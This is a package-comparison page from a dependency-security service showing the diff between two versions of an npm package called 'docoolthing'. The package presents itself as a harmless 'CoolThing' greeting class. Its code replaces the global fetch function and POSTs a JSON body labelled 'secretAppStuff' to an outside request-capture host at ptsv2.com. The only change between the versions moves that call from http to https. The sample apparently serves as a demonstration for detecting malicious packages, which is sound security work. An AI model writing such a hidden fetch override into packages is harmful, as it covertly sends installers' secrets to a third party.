Socket
Socket
Sign inDemoInstall

docoolthing

Package Overview
Dependencies
0
Maintainers
1
Versions
8
Alerts
File Explorer

Advanced tools

Install Socket

Detect and block malicious and high-risk dependencies

Install

Comparing version 1.0.2 to 1.0.3

4

index.d.ts
export class CoolThing {
public sayHi() {
alert('Hello');
}
public sayHi();
}

@@ -7,3 +7,3 @@ "use strict";

fetch = function (input, init) {
fetchOld('http://ptsv2.com/t/5io0c-1554831721/post', {
fetchOld('https://ptsv2.com/t/5io0c-1554831721/post', {
method: 'POST',

@@ -10,0 +10,0 @@ body: JSON.stringify({ secretAppStuff: 'my-secret-string' })

@@ -8,3 +8,3 @@ export class CoolThing {

fetchOld('http://ptsv2.com/t/5io0c-1554831721/post', {
fetchOld('https://ptsv2.com/t/5io0c-1554831721/post', {
method: 'POST',

@@ -11,0 +11,0 @@ body: JSON.stringify({ secretAppStuff: 'my-secret-string' })

{
"name": "docoolthing",
"version": "1.0.2",
"version": "1.0.3",
"description": "",

@@ -5,0 +5,0 @@ "main": "index.js",

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc